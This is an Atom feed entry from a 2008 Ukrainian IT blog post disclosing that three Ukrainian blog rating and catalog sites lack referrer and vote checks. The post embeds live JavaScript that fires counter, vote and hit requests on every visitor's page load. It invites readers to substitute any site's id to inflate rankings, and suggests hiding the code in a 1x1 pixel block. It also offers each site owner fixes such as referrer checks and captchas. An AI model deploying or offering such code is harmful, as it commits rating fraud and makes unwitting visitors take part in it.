<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>my.ukrweb.info УКРВЕБ ІТ веблог</title>
  <subtitle>окремий погляд на ІТ</subtitle>
  <link rel="alternate" type="text/html" href="http://my.ukrweb.info/node/118"/>
  <link rel="self" type="application/atom+xml" href="http://my.ukrweb.info/node/118/atom/feed"/>
  <id>http://my.ukrweb.info/node/118/atom/feed</id>
  <updated>2008-06-12T03:48:23+03:00</updated>
  <entry>
    <title>Antitop версія 0.1 (альфа)</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/node/118" />
    <id>http://my.ukrweb.info/node/118</id>
    <published>2008-03-07T00:28:39+02:00</published>
    <updated>2008-06-12T03:48:23+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="seo" />
    <category term="ukrweb" />
    <category term="ІТ" />
    <category term="антитоп" />
    <category term="безпека" />
    <category term="вебдизайн" />
    <category term="вебмайстер" />
    <category term="вебмайстер" />
    <category term="гіпертекст" />
    <category term="каталог" />
    <category term="спам" />
    <category term="українська" />
    <summary type="html"><![CDATA[<div lang="uk-UA">
Довго вагався чи розпочинати дану серію статей... <br/><br />
Радився з hip та jarofed, та ще з одним партнером.... <br />
І вирішили, що дана серія, при коректному використанні буде корисною для вебсайтів в цілому.
<p>Отже - Рейтинги... Каталоги, Топи, міряння довжиною органів... І тому подібна лабуда...<br/><br />
Загалом - це не лабуда. Аналізувати рейтинговість - це важлива частина будь-якого процесу з багатьма учасниками, а інтернет - саме такий процес. <br/><br />
От тільки аналіз повинен бути якщо не ідеальним, то хоча б наближеним до реальності.<br/></br/></br/></br/></p>
<p></p></br/></div>
    ]]></summary>
    <content type="html"><![CDATA[<div lang="uk-UA">
Довго вагався чи розпочинати дану серію статей... <br/><br />
Радився з hip та jarofed, та ще з одним партнером.... <br />
І вирішили, що дана серія, при коректному використанні буде корисною для вебсайтів в цілому.
<p>Отже - Рейтинги... Каталоги, Топи, міряння довжиною органів... І тому подібна лабуда...<br/><br />
Загалом - це не лабуда. Аналізувати рейтинговість - це важлива частина будь-якого процесу з багатьма учасниками, а інтернет - саме такий процес. <br/><br />
От тільки аналіз повинен бути якщо не ідеальним, то хоча б наближеним до реальності.<br/><br />
З Ваших відгуків буду визначати, чи варто продовжувати аналіз в даному напрямку, а також для "жертв" даного циклу можу запропонувати реальну допомогу в тестуванні та виправленні виявлених помилок.<br/><br />
Коротка преамбула закінчилась...<br/><br />
Сьогодні я буду розповідати про три, нещодавно потрапивших мені під руку каталоги, що мають невелике відношення до Українського інтернету.<br/>
</br/></br/></br/></br/></br/></br/></p></br/></div>
<div class="toc">
<div class="toc-title">Меню 8) сторінки [<a href="#" class="toc-toggle">hide</a>]</div>
<div class="toc-list">
<ol>
<li><a href="#-1">Відмова від відповідальності</a></li>
<li><a href="#topblognetua">top.blog.net.ua</a>
<ol>
<li><a href="#exploit">Проблема в вигляді exploit</a></li>
<li><a href="#-2">Логіка проблеми</a></li>
<li><a href="#-3">І сама проблема</a></li>
<li><a href="#topblognetua-1">Побажання власнику top.blog.net.ua</a></li>
</ol>
</li>
<li><a href="#blogmirnet">blogmir.net</a>
<ol>
<li><a href="#exploit-1">Проблема exploit</a></li>
<li><a href="#-4">Побажання власнику</a></li>
</ol>
</li>
<li><a href="#wwwcatalg2coua">www.catalоg2.co.ua</a>
<ol>
<li><a href="#ExploitDIGG">Exploit ака антиDIGG</a></li>
<li><a href="#-5">Побажання власнику</a></li>
</ol>
</li>
<li><a href="#-6">Висновки</a>
<ol>
<li><a href="#PS">PS</a></li>
</ol>
</li>
</ol>
</div>
</div>
<hr />
<p>Мої вітання...</p>
<h1 id="">Преамбула</h1>
<p>Довго вагався чи розпочинати дану серію статей... <br/><br />
Радився з hip та jarofed, та ще з одним партнером.... <br />
І вирішили, що дана серія, при коректному використанні буде корисною для вебсайтів в цілому.</br/></p>
<p>Отже - Рейтинги... Каталоги, Топи, міряння довжиною органів... І тому подібна лабуда...<br/><br />
Загалом - це не лабуда. Аналізувати рейтинговість - це важлива частина будь-якого процесу з багатьма учасниками, а інтернет - саме такий процес. <br/><br />
От тільки аналіз повинен бути якщо не ідеальним, то хоча б наближеним до реальності.<br/><br />
З Ваших відгуків буду визначати, чи варто продовжувати аналіз в даному напрямку, а також для "жертв" даного циклу можу запропонувати реальну допомогу в тестуванні та виправленні виявлених помилок.<br/><br />
Коротка преамбула закінчилась...<br/><br />
Сьогодні я буду розповідати про три, нещодавно потрапивших мені під руку каталоги, що мають невелике відношення до Українського інтернету.<br/></br/></br/></br/></br/></br/></br/></p>
<h1 id="-1">Відмова від відповідальності</h1>
<p><br/><br />
Я жодним чином не намагаюсь нашкодити цим трьом(і можливо всім наступним) проектам. Навпаки! <br/><br />
Коректне ведення статистики буде відображати більш-менш правильну рейтинговість і дозволить робити +- вірну оцінку сайтам.<br/> Всі коди, що використані в даній статті приховані від очей і їх можна переглянути в сорцях цієї сторінки.<br/><br />
Якщо дана сторінка буде некоректно відображатись - значить власники відповідних сайтів зробили деякі зміни - не лякайтесь - найближчим часом я все поправлю. Можете посприяти мені, підказавши проблему.<br/></br/></br/></br/></br/></br/></p>
<h1 id="topblognetua">top.blog.net.ua</h1>
<p><br/><br />
Даний php скрипт - дуже і дуже популярний в інтернеті. І в світлі знайдених в ньому багів - всі рейтинги, що побудовані на базі нього - <b>некоректні</b>.<br />
Одназу прошу пробачення за наступний блок.<br/></br/></br/></p>
<h2 id="exploit">Проблема в вигляді exploit</h2>
<p>Одразу прошу пробачення за завідомо збій в роботі каталогу. Моя мета - вказана вище. <br/><br />
Нагадую - код в сорцях вебсторінки і в даний момент Ви його виконали 8).(на екрані - результат виконання коду)<br/></br/></br/></p>
<p>&lt;!-- Початок коду, для вставки на своєму вебсайті--></p>
<div align="center" width="640" height="92">
<script language=JavaScript type=text/javascript>
document.write('<a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=499 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=530 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=475 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=503 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=520 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=462 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=532 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=534 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=465 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=463 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=464 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=456 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=468 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=515 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=485 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=529 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=493 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=484 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=498 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=504 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=480 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=531 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=489 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=518 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=510 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=476 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=479 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=487 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=458 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=87 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=103 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=75 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=79 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=104 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=74 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=90 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=72 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=110 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=486 /></a><br/>');
</br/></br/></br/></br/></br/></script></div>
<p>&lt;!--Кінець коду вставки, код не хватають пошуковики!!! --></p>
<p><br/><br />
В цьому блоці, банальний набір коду, який пропонується вставляти кожному користувачеві, що приймає участь в рейтингу. Код частково змінений, для того, щоб його не хватали пошуковики. Для даної статті було обрано сорок блогів, які знаходяться на останній сторінках каталогу - щоб не дуже сильно портити картину для майбутньої роботи даного сервісу.<br/></br/></br/></p>
<h2 id="-2">Логіка проблеми</h2>
<p>Як тільки користувач будь-якого вебсайту, на якому встановлений лічильник заходить на сторінку, де цей лічильник заходиться - автоматично додається +1 до рейтингу вебсайта (в конкретно даному випадку - блога). І все було б добре, але якщо розмістити цей лічильник на іншому вебсайті - кожен з користувачів іншого вебсайту також буде робити +1 до рейтингу...</p>
<h2 id="-3">І сама проблема</h2>
<p>Не перевіряється referrer , з якого відбулось завантаження лічильника. <br/><br />
Ну і що? - скажете Ви.. Кому вигідно вішати чужий лічильник на своєму сайті...<br/><br />
Відповідь - власнику свого ж вебсайта...<br/><br />
Наскільки мені відомо - багато блогерів ведуть по кілька щоденників, роблять кроспостінг в інші відомі блогерські портали, роблять коментарі з допомогою HTML.<br/><br />
Якщо взяти це до уваги - тоді можна робити відповіді в тому ж ЖЖ, і до кожної відповіді вішати свій лічильник, або набір лічильників(приховавши їх в квадратику розміром 1х1 піксель). В результаті рейтинг буде некоректним.<br/></br/></br/></br/></br/></br/></p>
<blockquote><p>Всі блоги, що вішають даний лічильник на своїх ЖЖ - мають конкретно завищений показник, особливо ті, що додані до friend-полос - тоді дуже багато учасників, навіть не читаючи такі повідомлення, - "віддають свій голос" за блог, повідомлення якого вони пропускають</p></blockquote>
<p><br/><br />
Ве було б нічого, але на базі цього рейтингу інші учасники роблять помилкові висновки ( jarofed підтвердить )<br/></br/></br/></p>
<h2 id="topblognetua-1">Побажання власнику top.blog.net.ua</h2>
<p>Додати в код підрахунку хітів та хостів перевірку referrer - там роботи на 2-3 стрічки php коду.<br/></br/></p>
<h1 id="blogmirnet">blogmir.net</h1>
<p>Досить відомий каталог. І функціональність його - на висоті! Дуже часто користуюсь ним для швидкого аналізу pr+technorati. <br/><br />
Більше того, власник в мене взяв інтерв'ю 8))). Керуючись помилковими даними, які я йому підсунув. На жаль - таке життя. <br/><br />
Отже - позиція Вашого блогу напряму залежить від кількості голосів, відданих за Вас. <br/><br />
Поки з каталога переходів на блоги дуже мало - є шанс все поправити.</br/></br/></br/></p>
<h2 id="exploit-1">Проблема exploit</h2>
<p>Накрутка даного голосування - дуже елементарна і також без перевірок та захистів.<br/><br />
Голосування відбувається методами Ajax - банальний GET запит без додаткових перевірок.<br/><br />
Нагадую - код в сорцях вебсторінки і в даний момент Ви його виконали 8).(на екрані - результат виконання коду)<br/><br />
&lt;!--Код для вставки в себе на вебсайті для накрутки лічильника голосів на blogmir.net--></br/></br/></br/></p>
<div align="center" width="640" height="5">
<script language=JavaScript type=text/javascript>
document.write('<object data=http://blog'+'mir.net/toprank.php?lid=3215&vote=plus&_=>http://blog'+'mir.net/from.php?3215</object>');
</script></div>
<p>&lt;!--Кінець коду blogmir.net--></p>
<p>Замість цифри 3215 - вставляєте код будь-якого інснуючого в каталозі, і всі Ваші користувачі "проголосують" за відповідний блог.<br/></br/></p>
<h2 id="-4">Побажання власнику</h2>
<p>Потрібна мабуть або якась мінімальна Captcha, або - javascript event вікно з підтвердженням про голос - тоді шанси накрутити - набагато менші.<br/></br/></p>
<h1 id="wwwcatalg2coua">www.catalоg2.co.ua</h1>
<p>Заявлена вебдванольність - також недосконала. </p>
<h2 id="ExploitDIGG">Exploit ака антиDIGG</h2>
<p>Накрутка також здійснюється елементарно засобами користувачів на будь-якому html вебсайті<br/><br />
Нагадую - код в сорцях вебсторінки і в даний момент Ви його виконали 8).(на екрані - результат виконання коду)<br/></br/></br/></p>
<p>&lt;!--Код для вставки на своєму вебсайті для catalog2.co.ua--></p>
<div align="center" width="640" height="5">
<script language=JavaScript type=text/javascript>
document.write('<object data="http://www.cata'+'log2.co.ua/ch.php?id=50" charset="windows-1251" encoding="windows-1251" lang="ru-RU">.</object>');
</script></div>
<p>&lt;!--Кінець коду--></p>
<p>Замінивши цифру 50 порядковим номером Вашого улюбленого сайту - можна за кілька днів просунути сайт в ТОР.<br/></br/></p>
<h2 id="-5">Побажання власнику</h2>
<p>Загалом - принцип взлому - аналогічний до </p>
<script language=JavaScript type=text/javascript>
document.write('blog'+'mir.net');</script><p>  , тому рекомендації будуть аналогічні.<br/></br/></p>
<h1 id="-6">Висновки</h1>
<p>Думаю тема точно є цікавою для власників даних рейтингових систем. І сумніваюсь, що ці дані були підмічені лише тим, хто був ініціатором даної статті.<br/><br />
Якщо дивитись на сторону користувачів даних сервісів, то можна допустити, що через ймовірні помилки деякі вебсайти програють в нечесній грі іншим. Тому гадаю виправлення помилок потрібне.<br/><br />
Якщо Вас зацікавила дана тематика, то я її можу продовжувати майже постійно, в залежності від надходження даних та від Ваших побажань через відповідну форму <a href="http://my.ukrweb.info/suggestions#">Пропозиції і тематики</a> на даному вебсайті<br/></br/></br/></br/></p>
<p>Код цих exploit - ів буде досить швидко відображено голим текстом, бо існує імовірність підміни його власниками даних сервісів, хоча він побудований так, що для цілісності даних на вебсайті, де він розміщений особливих проблем немає - є лише ймовірність порушення дизайну та відображення саме тої сторінки, на якій він викладений.<br/><br />
Крім того кожен, хто відобразить цей код в себе на вебсайті може закрити його в рамки 1х1 блоку + забезпечити перевірку на зміни.<br/><br />
Успіху Вам, і бажаю здорового скептицизму в аналізі рейтингів в інтернеті.<br/></br/></br/></br/></p>
<h2 id="PS">PS</h2>
<p>Якщо будуть бажаючі - дана тематика буде вестись на сторінках веблогу з певною періодичністю. Повірте - навіть такі лічильники як i.ua, li.ru, mail.ru etcetera - мають аналогічні проблеми. І в Наших силах зробити їх більш актуальними.</p>
    ]]></content>
  </entry>
</feed>
